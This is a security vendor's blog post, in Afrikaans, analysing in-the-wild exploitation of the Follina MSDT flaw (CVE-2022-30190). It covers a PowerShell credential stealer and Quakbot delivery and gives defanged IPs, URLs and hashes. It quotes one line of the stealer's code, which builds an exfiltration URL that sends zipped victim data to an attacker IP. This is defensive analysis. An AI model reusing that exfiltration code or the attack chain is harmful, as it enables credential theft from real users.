• Produkte en dienste
        • Wolk

          • Endpoint Protection
          • Endpoint Detection and Response
          • Mobile Device Management
          • BJET
          • Extended Detection and Response
          • Zero Trust Network Access
          • Data Privacy
        • Op die perseel

          • Endpoint Protection
          • Endpoint Detection and Response
          • Data Privacy
        • platform

          • Malware Analysis Platform
        • Small Business

          • SOHO Total Edition
        • Dienste

          • Threat Intel
          • Digital Risk Protection Services (DRPS)
          • Ransomware Recovery as a Services (RRaaS)
          • DPDP Compliance
          • Managed Detection and Response
          • Kubersekuriteit & Data Privacy Bewustheid
  • Oplossings
    • BFSI
    • Onderwys
    • Regering
    • Healthcare
    • ITeS
    • vervaardiging
  • maatskappy
    • Oor Seqrite
    • Leierskap
    • Toekennings en sertifiserings
    • Nuus
  • Vennote
    • Vennootprogram
    • Vind Vennoot
    • Word 'n Vennoot
  • Ondersteuning
  • hulpbronne
    • blogs
    • White Papers
    • Datavelle
    • Gevallestudies
    • Bedreigingsverslae
    • Handleidings
    • PoV
    • begrip Data Privacy
    • Kontroleer jou risikotelling
    • DPDP Dialoë
    • Privaatheidsuur
Seqrite Labs Nuus
Kontak Verkope Onder Aanval?
  • Produkte en dienste
        • Wolk

          • Endpoint Protection
          • Endpoint Detection and Response
          • Mobile Device Management
          • BJET
          • Extended Detection and Response
          • Zero Trust Network Access
          • Data Privacy
        • Op die perseel

          • Endpoint Protection
          • Endpoint Detection and Response
          • Data Privacy
        • platform

          • Malware Analysis Platform
        • Small Business

          • SOHO Total Edition
        • Dienste

          • Threat Intel
          • Digital Risk Protection Services (DRPS)
          • Ransomware Recovery as a Services (RRaaS)
          • DPDP Compliance
          • Managed Detection and Response
          • Kubersekuriteit & Data Privacy Bewustheid
  • Oplossings
    • BFSI
    • Onderwys
    • Regering
    • Healthcare
    • ITeS
    • vervaardiging
  • maatskappy
    • Oor Seqrite
    • Leierskap
    • Toekennings en sertifiserings
    • Nuus
  • Vennote
    • Vennootprogram
    • Vind Vennoot
    • Word 'n Vennoot
  • Ondersteuning
  • hulpbronne
    • blogs
    • White Papers
    • Datavelle
    • Gevallestudies
    • Bedreigingsverslae
    • Handleidings
    • PoV
    • begrip Data Privacy
    • Kontroleer jou risikotelling
    • DPDP Dialoë
    • Privaatheidsuur
Webbladsy  /  Kuber sekuriteit  / CVE-2022-30190: Nul-dag kwesbaarheid “Follina” in MSDT in die natuur uitgebuit
CVE-2022-30190: Nul-dag kwesbaarheid “Follina” in MSDT in die natuur uitgebuit
10 Junie 2022

CVE-2022-30190: Nul-dag kwesbaarheid “Follina” in MSDT in die natuur uitgebuit

Geskryf deur Amruta Wagh
Amruta Wagh
Kuber sekuriteit

Op 30 Mei 2022 is CVE-2022-30190 “FOLLINA,” 'n kwesbaarheid vir die uitvoering van nul-dag-afstandkode, in Microsoft Windows Support Diagnostic Tool (MSDT) met hoë erns (CVSS:9.3) ontdek.

Hierdie MSDT-instrument diagnoseer probleme met toepassings soos Microsoft Office-dokumente. Aanvanklike aanvalvektore soos Word-dokumente gebruik 'n afstandsjabloonfunksionaliteit om die HTML-lêer af te laai, wat dan die URL-protokol gebruik om hierdie diagnostiese instrument (MSDT) te bel en kwaadwillige kode uit te voer. Terselfdertyd was die aanvanklike aanvalle beperk tot Microsoft Word, maar onlangs het aanvalvektore uitgebrei om die RTF en Outlook in te sluit.

Hierdie kwesbaarheid is in die natuur uitgebuit, en bedreigingsakteurs wat dit suksesvol beïnvloed, kan arbitrêre kode uitvoer en bykomende programme installeer. Bedreigingsakteurs gebruik hierdie fout om Backdoors, AsyncRAT, Quakbot en ander wanware na verbruikers en sektore regoor Noord-Amerika en Europa te versprei.

Gedetailleerde Analise van die Kwetsbaarheid:

Die aanvanklike toepassing wat die MSDT-instrument aanroep, sal Microsoft Office wees (Word, Excel, RTF ens.)

Fig. Vloeidiagram

Hieronder is 'n voorbeeld van 'n RTF-voorbeeld met die naam "Employment_Agreement_Template." Hierdie RTF-dokumente gebruik OLE-objekte.

Fig. RTF-lêer met OLE voorwerpe

Wanneer hierdie dokument oopgemaak word, wys dit die volgende boodskap:-

Sodra die slagoffer op "Ja" klik, word 'n geënkodeerde HTML-lêer afgelaai vanaf die ingebedde skakel http[:]//45[.]76[.]53[.]253/1.html, soos hieronder geïllustreer:-

HTML-dokumente bevat gekommenteerde "A"-karakters onderaan die lêer wat hieronder kode gevind word.

Fig. Geënkodeerde data in HTML-lêer

Ingeslote kode binne 'n HTML-lêer roep PCWDiagnostic aan met behulp van ms-msdt met parameter IT_BrowseForFile wat PowerShell-sintaksis insluit. Die gedekodeerde deel van base64-geënkodeerde data is –

Fig. Gedekodeerde data

Hierdie kode stop die msdt.exe as dit loop en koppel aan URL “hXXps [:]//seller-notification [.]live/Zgfbe234dg” en laai 'n POWERSHELL-skrip af.

Die Follina-aanval is gebruik om PowerShell-gebaseerde Stealer te ontplooi . Kom ons kyk verder na die inhoud daarvan:

Fig. Skripinhoud deel 1

Die skrip tel binne Appdata/Roaming op en probeer om aanmelddata, koekies, ens. van toepassings soos Firefox, Opera, Yandex, Vivaldi, CentBrowser, Comodo, Chedot, Orbitum, Chromium, Slimjet, Xvast, Kinza, Iridium, CocCoc, AVAST Software, Chrome, Outlook, Thunderbird, NetSarang, Windows Live, FileZilla, MobaXterm, WeChat te steel.

Die dief navraag doen in die register om inligting te steel wat verband hou met die volgende toepassings: Autodesk, MobaXterm, Oray SunLogin RemoteClient, MailMaster, Navicat, WinSCP, Microsoft Office, FTP, RAdmin, ens.

Fig. Skripinhoud deel 2

Afgesien hiervan, versamel dit ook inligting wat verband hou met die masjien:

  • Stelselinligting (wat gasheernaam, OS-verwante inligting, eienaar, BIOS-inligting, geregistreerde eienaar insluit)
    Produk-ID, oorspronklike installasiedatum, stelselopstarttyd, stelselvervaardiger, stelselmodel, stelseltipe, verwerker, BIOS-weergawe, stelsellokaliteit, tydsone, totale fisiese geheue, domein, aanmeldbediener, ens.)
  • IP-konfigurasie (via Ipconfig)
  • Werkstasiekonfigurasie
  • Gebruikersrekeninge-inligting
  • Plaaslike Groepadministrateurs
  • Produknaamweergawes

'n .Zip-lêer word in %temp% geskep en na URL gestuur:

$http_url = “hxxp://45[.]77.156[.]179:443/” + $ip + “———-” + $time1 + “.zip”

$time1 is die epoch-tydstempel wat bereken word deur

Dit dien ook as 'n virtualiseringstoets.

Kom ons kyk na nog 'n voorbeeld van Quakbot:

Phishing-e-pos wat kwaadwillige html-aanhegsels bevat, laai argieflêers af (.img) (ed63c189b52e4eb663598dc0c3121e05). Hierdie argief bevat .lnk (76390978f26d3c6d7f799257542796ce), qbot-vrag (a14d48974eab6839b1238f984b3c28d2) en doc-lêer (e7015438268464cedad98b1544d643ad).

Fig. Vloeidiagram

Die qbot-vrag in die zip-lêer word uitgevoer via .lnk, en die .doc-lêer laai die HTML-lêer af. Hierdie .html-lêer laai weer 'n ander .qbot-vrag af deur Follina te benut.

Hier word die HTML-lêer afgelaai vanaf http[:]//185[.]234[.]247[.]119 en bevat data wat in die volgende figuur getoon word:-

Fig. HTML-lêerdata

Hierdie HTML koppel aan die bogenoemde URL'e en laai Quakbot dll(ce86511634b5420332eb6267c0e2ae2e) af wat dan via regsvr32.exe uitgevoer word.

analise:

 Hierdie quakbot-lêer is 'n Delphi-saamgestelde lêer met geïnkripteerde data in die .rsrc-afdeling binne RCDATA, wat in die virtueel toegekende geheue ontsyfer word. Die onderstaande figure toon die geïnkripteerde data en die dekripsielus.

Fig. Geënkripteerde data 

Fig. Beskrywing lus

Dit word ontsyfer in API's en die 1ste fase PE-lêer

Die vloei gaan nou na die eerste fase, wat verantwoordelik is vir DLL-inspuiting en die Quakbot-vrag na die geheue bring. RC1-dekripsie word op die geïnkripteerde stringe gedoen, wat die lys van prosesse soos AV-verwante prosesse, ens. inbring. As hulle aan die gang gevind word, sluit die vrag af. In die onderstaande figuur kan ons sien hoe die prosesse nagegaan word.

Die lys van prosesse wat nagegaan word, sluit in:-

Later voer dit prosesinspuiting uit in “onedrivesetup.exe”:-

Qbot word geassosieer met die veldtog "obama186". Hieronder is die beeld wat C2-verbindings vanaf "onedrivesetup.exe" wys:-

Omleidingstegnieke:

Ons het gesien hoe aanvallers koderingsmetodes in aanvanklike aanvalvektore gebruik om opsporings te omseil. Die volgende voorbeelde illustreer dit.

Fig. Voorbeeld nr. 1

Fig. Voorbeeld nr. 2

Gevolgtrekking:

Dit is een van die mees kritieke nul-dae-aanvalle in onlangse tye. Hierdie CVE het baie omseiltegnieke gebruik, het nie 'n oplossing nie en kan maklik uitgebuit word. Nadat die sekuriteitsopdatering van Microsoft beskikbaar is, moet gebruikers dit onmiddellik regstel. Tot dan raai ons organisasies aan om op hul hoede te wees en die onderstaande versagtende aksies te volg om die aanvaloppervlak en moontlike skade te verminder. 

Vir die remediëring van 'Follina', volg asseblief die advies:

 https://blogs.quickheal.com/threat-advisory-cve-2022-30190-follina-severe-zero-day-vulnerability-discovered-in-msdt/

Hoe beskerm Quick Heal sy kliënte?

Quick Heal-produkte se bestaande gevorderde beskermingstegnologieë beskerm ons kliënte teen Follina.

Ons het 'n opsporing genaamd "CVE_2022_30190_Follina" vir Follina in ons gedragstegnologie. Net so, in die Seqrite Hawk Hunt-produk, ons het 'n beleid genaamd “QHIR_CVE_2022_30190_Follina” om hierdie aanval te identifiseer.

Hier volg die lêergebaseerde en netwerkgebaseerde opsporings vir Follina:

1. Lêergebaseerd:

  • Agterdeur.Turian.S28183972
  • Trojaan.Qbot.S28211728
  • CVE-2022-30190.46655
  • CVE-2022-30190.46638
  • CVE-2022-30190.46635
  • CVE-2022-30190.46624

2. Netwerkgebaseerd:

  • CVE-2022-30190.RCE!46674
  • CVE-2022-30190.RCE!46675

 

Onderwerp deskundige

Tejaswini Sandapolla

Amruta Wagh

 vorige PosBedreigingsadvies: CVE-2022-30190 'Follina' – Ernstige nuldag...
volgende Pos  CVE-2022-26134: Aktief ontginde Atlassian OGNL-inspuiting nul-...
Amruta Wagh

Oor Amruta Wagh

Amruta is 'n Sekuriteitsnavorser by Quick Heal Technologies. Sy stel belang in wanware-analise, omgekeerde ingenieurswese en is op soek na huidige wanware...

Artikels deur Amruta Wagh »

Verwante poste

  • Hoekom Threat IntelLisensie is die ontbrekende skakel in jou kuberveiligheidsstrategie

    Julie 25, 2025
  • Gelok en in die gedrang gebring: Ontmaskering van die digitale gevaar van heuningvalle

    Junie 17, 2025
  • Operasie Sindoor – Anatomie van 'n Digitale Beleg

    Mag 23, 2025
Aanbevole outeurs
  • Seqrite
    Seqrite

    Seqrite is 'n toonaangewende verskaffer van kuberveiligheidsoplossings vir ondernemings. Met 'n fokus...

    Lees meer artikels deur Seqrite
  • Bineesh P
    Bineesh P

    Ek is 'n passievolle kuberveiligheidsentoesias en 'n toegewyde skrywer. Met 'n aanleg...

    Lees meer artikels deur Bineesh P.
  • Jyoti Karlekar
    Jyoti Karlekar

    Ek is 'n ywerige skrywer wat daarvan hou om inhoud oor opkomende tegnologieë te skep en...

    Lees meer artikels deur Jyoti Karlekar
  • Sanjay Katkar
    Sanjay Katkar

    Sanjay Katkar is die mede-besturende direkteur van Quick Heal Technologies...

    Lees meer artikels deur Sanjay Katkar
onderwerpe
bekwaam (25) Kuberaanval (36) kuber-aanvalle (58) cyberattack (16) cyberattacks (15) Kuber sekuriteit (342) kuber-sekuriteit (34) Cyber ​​bedreiging (33) kuber bedreigings (51) databreuk (56) data oortredings (29) verlies van data (28) voorkoming van dataverlies (34) data privacy (17) die beskerming van data (35) beveiliging van data (19) DLP (50) DPDP (14) DPDPA (17) Enkripsie (16) eindpunt sekuriteit (113) Onderneming sekuriteit (20) ontgin (13) BBP (14) malware (76) malware analise (14) malware aanval (23) MDM (27) Microsoft (15) MITER ATT&CK (14) sekuriteit netwerk (26) phishing (30) ransomware (69) ransomware aanval (31) ransomware aanvalle (31) ransomware beskerming (17) Seqrite (41) Seqrite Enkripsie (27) Seqrite EPS (33) Seqrite Dienste (16) bedreiging opsporing (14) Threat Intelligensie (22) UTM (34) Kwesbaarheid (16) nul vertroue (13)
Seqrite Labs

Toonaangewende verskaffer van IT-sekuriteitsoplossings vir ondernemings wat eindpunt-, data- en netwerksekuriteit vereenvoudig met die beste oplossings vir bedreigingsvoorkoming, -opsporing en -reaksie wêreldwyd.

Lees meer oor Seqrite

Volg ons:

Teken in op ons nuusbrief

Bly op hoogte van die nuutste kuberveiligheidstendense en insigte.

Laai
Produkte en dienste
  • Wolk
  • Endpoint Protection
  • Endpoint Detection and Response
  • Mobile Device Management
  • BJET
  • Extended Detection and Response
  • Zero Trust Network Access
  • Data Privacy
  • Op die perseel
  • Endpoint Protection
  • Endpoint Detection and Response
  • Data Privacy
  • platform
  • Malware Analysis Platform
  • Mikrobesigheid
  • SOHO Total Edition
  • Dienste
  • Threat Intel
  • Digital Risk Protection Services (DRPS)
  • Ransomware Recovery as a Services (RRaaS)
  • DPDP Compliance
  • Managed Detection and Response
  • Kubersekuriteit & Data Privacy Bewustheid
hulpbronne
  • blogs
  • White Papers
  • Datavelle
  • Bedreigingsverslae
  • Handleidings
  • PoV
  • begrip Data Privacy
  • DPDP Dialoë
  • Beleid en Nakoming
  • EULA
  • GoDeep.KI
  • SIA
  • Privaatheidsuur
Kontak Ons
  • Geregistreerde kantore
  • Kom ons praat oor kuberveiligheid
Ondersteuning
  • Tegniese ondersteuning
  • Laai sagteware af
  • Vanlyn Opdaterer
  • Firmware-opgraderings
  • Opgraderings
  • Produk Dokumentasie
Oor Ons
  • Oor Seqrite
  • Leierskap
  • Toekennings en erkenning
  • Nuus
vennoot
  • Vennootprogram
  • Vind Vennoot
  • Word 'n Vennoot
  • Seqrite sertifisering

© 2026 Quick Heal Technologies Bpk.

Webkaart Privaatheidsbeleid regskennisgewings Koekiebeleide Terme van die gebruik